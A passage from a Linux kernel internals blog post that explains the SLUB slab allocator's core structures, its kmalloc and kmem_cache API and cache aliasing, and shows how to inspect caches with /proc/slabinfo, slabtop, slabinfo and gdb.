href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414">oo_order()</a></code>).</p><p><code>min</code> <em>I believe</em> stores the minimum <code>oo</code> counts for slabs without any debugging or extra metadata enabled. 
Such that when enabling those features, the kernel can compare if <code>oo</code> has increased from <code>min</code> and decide whether to still enable them if desired. </p><p><code>reciprocal_size</code> is, well, the reciprocal of <code>size</code>. If you also don&apos;t math, this is basically the properly calculated value of <code>1/size</code>. This is used by <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179">obj_to_index()</a></code> for determining the index of an object within a slab.</p><p><code>list</code> is a linked list of all <code>struct kmem_cache</code> on the system and is exported as <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258">slab_caches</a></code>.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/so_far_so_good.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>So far we&apos;ve covered some of the main metadata, but now we&apos;ll dive into some of the members involved in actually facilitating allocations.</p><p><code>cpu_slab</code> is a per CPU reference to a <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>. This means that under-the-hood this is an array of sorts and each CPU uses a different index<sup><a href="https://lwn.net/Articles/452884/">[4]</a></sup>, thus having a reference to a different <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>. </p><p>We&apos;ll touch more on this structure soon, but it represents the &quot;active&quot; slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!). 
</p><p><code>node[MAX_NUMNODES]</code> on the other hand is a per node reference to a <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">struct kmem_cache_node</a></code>. This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after <code>cpu_slab</code>.</p><p><code>min_partial</code> defines the minimum number of slabs in a partial list, even if they&apos;re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there are <code>min_partial</code> or fewer slabs in the partial list!</p><p><code>offset</code> stores the &quot;free pointer offset&quot;. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. This would usually be zero and probably changes with debugging/flag tweaks.</p><p><code><a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html">CONFIG_SLUB_CPU_PARTIAL</a></code> enables <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code> to not just track a per CPU &quot;active&quot; slab but also have its own per CPU partial list. After explaining the roles of <code>cpu_slab</code> and <code>node[]</code> the benefits should become clearer.</p><p><code>cpu_partial</code> and <code>cpu_partial_slabs</code> define the number of partial objects and partial slabs to keep around.</p><p><code>allocflags</code> allows a cache to define GFP flags<sup><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">[5]</a></sup> to apply to allocations, which can determine allocator behaviour. 
These can also be added through the allocation API.</p><p><code>ctor()</code> lets the cache define a constructor to be called on the object during <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806">setup_object()</a></code> which is called when a new slab is allocated. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/yes_its_over_now.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="500" height="207"></figure><p>And that&apos;s more or less all the key fields in <code>kmem_cache</code>! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.</p><p>There&apos;s of course some fields I missed out, associated with debugging, mitigations or other bits and pieces that probably didn&apos;t justify the bloat but I may come back to some time.</p><h4 id="struct-kmemcachecpu">struct kmem_cache_cpu</h4><figure class="kg-card kg-code-card"><pre><code class="language-C">struct kmem_cache_cpu {
	void **freelist;	/* Pointer to next available object */
	unsigned long tid;	/* Globally unique transaction id */
	struct slab *slab;	/* The slab from which we are allocating */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	struct slab *partial;	/* Partially allocated frozen slabs */
#endif
	local_lock_t lock;	/* Protects the fields above */
#ifdef CONFIG_SLUB_STATS
	unsigned stat[NR_SLUB_STAT_ITEMS];
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">&#xA0;/include/linux/slub_def.h</a></figcaption></figure><p>Bet you&apos;re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let&apos;s dive into <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>, which tracks an active slab (and partial list) for a specific CPU.</p><p><code>freelist</code> points to the next available (free) object in the active slab, <code>slab</code>. This is a <code>void **</code> as each free object contains a pointer to the next free object in the slab.</p><p><code>slab</code> points to the <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code> representing the &quot;active&quot; slab, i.e. the slab we&apos;re allocating from for this CPU. We&apos;ll explore this more soon.</p><p><code>partial</code> is the per cpu partial list we mentioned earlier, when <code><a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html">CONFIG_SLUB_CPU_PARTIAL</a></code> is enabled (it should be on server/desktop). 
This points to a list of partially full <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/hard_time_visualising.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"><figcaption>u and me both</figcaption></figure><p>Okay so let&apos;s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!</p><p>In this example let&apos;s say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it&apos;s <code>kmalloc()</code>), from the general purpose cache for 512 byte objects, <code>kmalloc-512</code>. There&apos;s a couple of ways this can go down!</p><p>If <code>cache-&gt;cpu_slab-&gt;slab</code> has several free objects, things are fairly simple. The address of the object pointed to by <code>cache-&gt;cpu_slab-&gt;freelist</code> will be returned to the caller. </p><p>The <code>freelist</code> will be updated to point to the next free object in <code>cache-&gt;cpu_slab-&gt;slab</code> and relevant metadata will be updated regarding this allocation.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/alloc_case1-2.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="691" height="272"><figcaption>the addr of <code>new obj</code> is returned to the caller</figcaption></figure><p>Before we dive into other allocation scenarios, let&apos;s cover one more structure (sorry)!</p><h4 id="struct-kmemcachenode">struct kmem_cache_node </h4><figure class="kg-card kg-code-card"><pre><code>struct kmem_cache_node {
	spinlock_t list_lock;

	unsigned long nr_partial;
	struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
	atomic_long_t nr_slabs;
	atomic_long_t total_objects;
	struct list_head full;
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">/mm/slab.h</a></figcaption></figure><p>We&apos;re almost there, folks! This structure tracks the partially full (<code>partial</code>) and full slabs for a particular node. We&apos;re talking about NUMA nodes here, which we <em>very briefly</em> touched on in the last post. </p><p>The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command <code>numactl -H</code>, which will let you know how many nodes you have and the CPUs that belong to each node!</p><p><code>partial</code> is a linked list of partially full <code>struct slabs</code>, the number of which is tracked by <code>nr_partial</code>; this should always be greater than or equal to <code>kmem_cache-&gt;min_partial</code>, as we touched on earlier. </p><p><code>full</code> is a linked list of full <code>struct slabs</code>. Not much else to say about that!</p><p><code>nr_slabs</code> is the total number of slabs tracked by this <code>kmem_cache_node</code>. Similarly, <code>total_objects</code> tracks the total number of allocated objects.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/let_me_show_you.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>So now we have more context about the internal SLUB structures, let&apos;s take what we know and apply that to a different allocation path, using the scenario from before.</p><p>If the <code>new obj</code> returned to the caller is the last free object in <code>cache-&gt;cpu_slab-&gt;slab</code>, the &quot;active&quot; <code>slab</code> is moved into its node&apos;s <code>full</code> list. The first slab from <code>cache-&gt;cpu_slab-&gt;partial</code> is then made the &quot;active&quot; <code>slab</code>. 
&#xA0;</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/alloc_case2.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="970" height="392"></figure><p>As you can imagine, there are many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed. </p><p>I won&apos;t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks! </p><h4 id="struct-slab">struct slab</h4><figure class="kg-card kg-code-card"><pre><code>struct slab {
	unsigned long __page_flags;

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
#ifdef CONFIG_SLUB_CPU_PARTIAL
		struct {
			struct slab *next;
			int slabs;	/* Nr of slabs left */
		};
#endif
	};
	struct kmem_cache *slab_cache;
	/* Double-word boundary */
	void *freelist;		/* first free object */
	union {
		unsigned long counters;
		struct {
			unsigned inuse:16;
			unsigned objects:15;
			unsigned frozen:1;
		};
	};
	unsigned int __unused;

	atomic_t __page_refcount;
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">/mm/slab.h</a></figcaption></figure><p>Last, but certainly not least, on our SLUB struct tour is <code>struct slab</code>. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?</p><p>Well, despite its benign look, <code>struct slab</code> is hiding something. It&apos;s actually a <code>struct page</code> in disguise. Wait, what?</p><p>Until recently (5.17)<sup><a href="https://lwn.net/Articles/881039/">[6]</a></sup>, a slab&apos;s metadata was accessed directly via a union in the <code>struct page</code> which represented the slab&apos;s memory<sup>[7]</sup>. </p><p>While that slab information <em>is still stored in </em><code>struct page</code>, <code>struct slab</code> was created as an effort to decouple the slab code from <code>struct page</code>, with the aim of moving the information out of <code>struct page</code> entirely in the future. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/stay_focused.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Anyway, with that little bit of excitement out of the way, let&apos;s see what some of these fields within <code>struct page</code>, uh I mean <code>struct slab</code> are saying!</p><p>The first <code>union</code> can contain several things: <code>slab_list</code>, the linked list this <code>slab</code> belongs in, e.g. the node&apos;s <code>full</code> list; a struct for CPU partial slabs where <code>next</code> is the next CPU partial slab and <code>slabs</code> is the number of slabs left in the CPU partial list. 
</p><p><code>slab_cache</code> is a reference to the <code>struct kmem_cache</code> this slab belongs to.</p><p><code>freelist</code> is a pointer to the first free object in this slab.</p><p>Then we have another <code>union</code>, this time used to view the same data in different ways. <code>counters</code> is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: <code>inuse</code>, <code>objects</code>, <code>frozen</code>.</p><p><code>objects</code> is a 15-bit counter defining the total number of objects in the slab, while <code>inuse</code> is a 16-bit counter used to track the number of objects in the slab being used (i.e. allocated and not yet freed). </p><p><code>frozen</code> is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are &quot;exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab&quot;.<sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">[8]</a></sup></p><p><code>CONFIG_MEMCG</code> &quot;provides control over the memory footprint of tasks in a cgroup&quot;<sup><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">[9]</a></sup>. Part of this includes accounting kernel memory for memory cgroups (memcgs)<sup><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">[10]</a></sup>. 
Allocations made with the GFP flag <code>GFP_KERNEL_ACCOUNT</code> are accounted.</p><p><code>memcg_data</code> is used when accounting is enabled to store &quot;the object cgroups vector associated with a slab&quot;<sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">[11]</a></sup>.</p><h4 id="wrap-up">Wrap-up</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/respct.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="400"></figure><p>Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that&apos;s a lot to take in; hopefully it&apos;s not <em>too</em> dry.</p><p>The aim of this section was to provide a decent foundational understanding of the SLUB allocator as seen in modern Linux kernels by exploring the core data structures used in its implementation and seeing how they fit together.</p><p>Next up we&apos;ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we&apos;ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.</p><hr><ol><li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23</a></li><li>Remember page order sizes from the previous section? 
A 0x1000 byte slab is an order 0 slab (2<sup>0</sup> pages).</li><li><a href="https://lwn.net/Articles/452884/">https://lwn.net/Articles/452884/</a></li><li><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html</a></li><li><a href="https://lwn.net/Articles/881039/">https://lwn.net/Articles/881039/</a></li><li>we&apos;ll remember from previous posts that there is a <code>struct page</code> for every physical page of memory that the kernel manages</li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">https://cateee.net/lkddb/web-lkddb/MEMCG.html</a></li><li><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt</a></li><li><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433</a></li></ol><h3 id="the-api">The API</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/here_we_go-again.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="518" height="336"></figure><p>Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel&apos;s SLUB allocator and explore its API.</p><p>Like all my posts, this is pretty ad hoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.</p><p>It&apos;s worth highlighting again that <strong>there are three slab allocator implementations</strong> in the Linux kernel: <strong>SLAB</strong>, <strong>SLUB</strong> &amp; <strong>SLOB</strong>. 
They share the same API, so as to abstract the implementation from the rest of the kernel.</p><p>As you might expect, be prepared for plenty of <code>#ifdef</code>s when perusing the source! The starting point for which is probably going to be <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h">include/linux/slab.h</a></code>.</p><h4 id="kmalloc-kfree">kmalloc &amp; kfree</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">void *kmalloc(size_t size, gfp_t flags)
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L586">/include/linux/slab.h</a></figcaption></figure><p>The bread and butter of the slab allocator API, <code>kmalloc()</code>, as the name implies, is essentially the kernel equivalent of C&apos;s <code>malloc()</code>. </p><p>It allows a kernel developer to request a memory allocation of <code>size</code> bytes; on success the function will return a pointer to the allocated memory, and <code>NULL</code> on failure<sup><a href="https://man7.org/linux/man-pages/man3/errno.3.html">[1]</a></sup>.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size)) {
		if (size &gt; KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);
	}
	return __kmalloc(size, flags);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h">/include/linux/slab.h</a></figcaption></figure><p>We can see the generic <code>kmalloc()</code> definition is a wrapper around <code>__kmalloc()</code> which is prototyped in <code>slab.h</code>, but the definition is slab implementation specific.</p><p>The <code>kmalloc()</code> wrapper essentially hands off large allocations (defined by <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290">KMALLOC_MAX_CACHE_SIZE</a></code>) to a separate function: <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526">kmalloc_large()</a></code> which in fact calls the underlying buddy allocator to serve large allocations!</p><p>Otherwise, <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434">__kmalloc()</a></code> is called, whose implementation can be found in <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412">/mm/slub.c</a></code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-c">void *__kmalloc(size_t size, gfp_t flags) { 
	struct kmem_cache *s;
	void *ret;
	...
	s = kmalloc_slab(size, flags);         [0]
	...
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412">/mm/slub.c</a></figcaption></figure><p>Bringing things back round to the SLUB allocator, if this is making an allocation of <code>size</code> bytes - what <code>kmem_cache</code> is it allocating from? Good question!</p><p>By default the kernel creates an array of general purpose <code>kmem_caches</code> depending on the &quot;kmalloc type&quot; (derived from <code>flags</code>) and the allocation <code>size</code>.</p><p>These caches are mainly created via <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875">create_kmalloc_caches()</a></code> and stored in the exported symbol <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">kmalloc_caches</a></code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">extern struct kmem_cache *
kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1];</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339">/include/linux/slab.h</a></figcaption></figure><p>So to answer our question: <code>kmalloc()</code> will determine which <code>kmem_cache</code> to allocate from by using the <code>flags</code> and <code>size</code> arguments to index into <code>kmalloc_caches</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">	return kmalloc_caches[kmalloc_type(flags)][index];</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L737">/mm/slab_common.c</a></figcaption></figure><p>The <code>index</code> above is derived from <code>size</code>. The general purpose cache size-to-index mapping can be seen via the <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386">__kmalloc_index()</a></code> definition. </p><p>This tells us the size of the objects in each <code>kmem_cache</code>, e.g. the <code>kmem_cache</code> for 256 byte objects will be at <code>index</code> 8. </p><p>Note that a <code>kmalloc()</code> allocation will use the smallest <code>kmem_cache</code> object size it can fit into. E.g. a 257 byte allocation won&apos;t fit into the 256 byte objects, so it will allocate from the next cache up, which holds 512 byte objects.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/if_that-makes_sense.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><figure class="kg-card kg-code-card"><pre><code class="language-c">void kfree(const void *objp)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L188">/include/linux/slab.h</a></figcaption></figure><p>Before you go throwing <code>kmalloc()</code>s left and right, don&apos;t forget <code>kfree()</code>! 
This is of course the ubiquitous function for freeing memory allocated via the slab allocator. </p><p>Calling this function on an object allocated via the slab allocator will free that object. If this slab was in the <code>full</code> list, it becomes <code>partial</code> and if this is the last object then the slab may get released altogether. </p><h4 id="kmemcachecreate">kmem_cache_create</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">struct kmem_cache *kmem_cache_create(const char *name, unsigned int size,
			unsigned int align, slab_flags_t flags,
void (*ctor)(void *));</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L150">/include/linux/slab.h</a></figcaption></figure><p>So we&apos;ve covered the fundamentals: allocating and freeing via the slab allocator. <code>kmem_cache_create()</code> allows kernel developers to create their own <code>kmem_cache</code> within the slab allocator - pretty neat, right?</p><p>Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like <code>struct task_struct</code>):</p><ul><li>We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal</li><li><code>ctor()</code> allows us to optimise initialisation of our objects if values are being reused </li><li>There&apos;s also debugging, security and other benefits to this but you get the gist!</li></ul><p>We can actually use Elixir to <a href="https://elixir.bootlin.com/linux/v6.0.6/A/ident/kmem_cache_create">see all the references</a> to <code>kmem_cache_create()</code> in the kernel to see who&apos;s making use of this too!</p><h4 id="kmemcachealloc">kmem_cache_alloc</h4><figure class="kg-card kg-code-card"><pre><code class="language-c">void *kmem_cache_alloc(struct kmem_cache *s, gfp_t flags) __assume_slab_alignment __malloc;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L435">/include/linux/slab.h</a></figcaption></figure><p>Once we&apos;ve created a <code>kmem_cache</code>, we can use <code>kmem_cache_alloc()</code> to allocate an object directly from that cache. You&apos;ll notice here we don&apos;t supply a <code>size</code>, as caches have fixed-size objects and we&apos;re specifying directly the cache we want to allocate from! </p><h4 id="cache-aliases">cache aliases</h4><p>Something I haven&apos;t mentioned up until now is the concept of SLUB aliasing. 
</p><p>To reduce fragmentation, the kernel may &quot;merge&quot; caches with similar properties (alignment, size, flags etc.). <code>find_mergeable()</code> implements this mergeability check:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">struct kmem_cache *find_mergeable(unsigned size, unsigned align,
slab_flags_t flags, const char *name, void (*ctor)(void *));</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L291">/mm/slab.h</a></figcaption></figure><p>A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via <code>kmem_cache_alloc()</code> for a merged cache will actually come from the respective general-purpose cache.</p><hr><ol><li><a href="https://man7.org/linux/man-pages/man3/errno.3.html">https://man7.org/linux/man-pages/man3/errno.3.html</a></li></ol><h3 id="seeing-it-in-action">Seeing It In Action</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/roll_up_my_sleeves.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>This is where things get fun! In this section we&apos;re gonna take what we&apos;ve learned throughout this post and double check I haven&apos;t been making it all up :D </p><h4 id="procslabinfo">/proc/slabinfo</h4><p>Our good ol&apos; friend <code><a href="https://man7.org/linux/man-pages/man5/proc.5.html">procfs</a></code> is coming in strong again with <code><a href="https://man7.org/linux/man-pages/man5/slabinfo.5.html">/proc/slabinfo</a></code>, which provides kernel slab allocator statistics to privileged users.</p><figure class="kg-card kg-code-card"><pre><code>$ sudo cat /proc/slabinfo
slabinfo - version: 2.1
# name            &lt;active_objs&gt; &lt;num_objs&gt; &lt;objsize&gt; &lt;objperslab&gt; &lt;pagesperslab&gt; : tunables &lt;limit&gt; &lt;batchcount&gt; &lt;sharedfactor&gt; : slabdata &lt;active_slabs&gt; &lt;num_slabs&gt; &lt;sharedavail&gt;
...
task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
...
dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
...
kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
...
kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0
</code></pre><figcaption>snippet from <code>$ sudo cat /proc/slabinfo</code></figcaption></figure><p>This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!</p><p>We can see a private cache named <code>task_struct</code>, used for <code>struct task_struct</code> allocations. Additionally we can see several general-purpose caches of various kmalloc types (<code>KMALLOC_DMA</code>, <code>KMALLOC_CGROUP</code> and <code>KMALLOC_NORMAL</code> respectively) and sizes.</p><h4 id="slabtop">slabtop</h4><p><code><a href="https://man7.org/linux/man-pages/man1/slabtop.1.html">slabtop</a></code> is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!</p><figure class="kg-card kg-code-card"><pre><code> Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
 Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
 Active / Total Caches (% used)     : 130 / 181 (71.8%)
 Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
 Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
 766116 766116 100%    0.10K  19644       39     78576K buffer_head
...
 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192
</code></pre><figcaption>snippet from <code>$ sudo slabtop</code></figcaption></figure><h4 id="slabinfo">slabinfo</h4><p>Perhaps confusingly, there is also a tool named <code>slabinfo</code> which is provided with the kernel source in <code>tools/vm/slabinfo.c</code> (calling <code>make</code> in <code>tools/vm</code> is all you need to do to build this and get stuck in).</p><p>To further the confusion, instead of <code>/proc/slabinfo</code>, <code>slabinfo</code> uses <code>/sys/kernel/slab/</code><sup><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">[1]</a></sup> as its source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by <code>slabinfo</code>.</p><p>Further to our section on cache aliases earlier, we can use <code>slabinfo -a</code> to see a list of all the current cache aliases on our system!</p><pre><code>$ ./slabinfo -a
...
:0000256     &lt;- key_jar 
</code></pre><p>Here we can see the <code>kmem_cache</code> with name <code>&quot;key_jar&quot;</code> is aliased with <code>kmalloc-256</code>.</p><h4 id="debugging">debugging</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/headband_prepare.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Sometimes you just can&apos;t beat getting stuck into some good ol&apos; kernel debugging. I&apos;ve covered previously how to get this set up<sup><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">[2]</a></sup>; it&apos;s fairly quick to get kernel debugging via <code>gdb</code> up and running on a QEMU/VMware guest, I promise!</p><p>After that we can explore to our heart&apos;s content. We can unravel the exported list <code>slab_caches</code> directly, or perhaps break on a call to <code>kmalloc()</code> and see what hits first.</p><pre><code>gef&#x27A4;  b __kmalloc
Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
...
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81347240 &#x2192; __kmalloc(size=0x108, flags=0xdc0)
[#1] 0xffffffff81c4911c &#x2192; kmalloc(flags=0xdc0, size=0x108)
[#2] 0xffffffff81c4911c &#x2192; kzalloc(flags=0xcc0, size=0x108)
[#3] 0xffffffff81c4911c &#x2192; fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
[#4] 0xffffffff81c44186 &#x2192; ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)</code></pre><p>Given I&apos;m ssh&apos;d into my guest, it&apos;s probably unsurprising there&apos;s network stuff kicking about. Looks like someone&apos;s requested a 0x108 byte object, and as we&apos;re going through <code>kmalloc()</code> this should end up in one of the general-purpose caches. </p><p>0x108 is 264 bytes, so that&apos;s just too big for the <code>kmalloc-256</code> cache, so we should expect an allocation from one of the 512 byte general-purpose caches, right? Let&apos;s find out!</p><pre><code class="language-c">void *__kmalloc(size_t size, gfp_t flags)
{
	struct kmem_cache *s;
	...
	s = kmalloc_slab(size, flags);
</code></pre><p>Looking at the source, we can see the call to <code>kmalloc_slab()</code> will return our cache.</p><pre><code>gef&#x27A4;  disas 
Dump of assembler code for function __kmalloc:
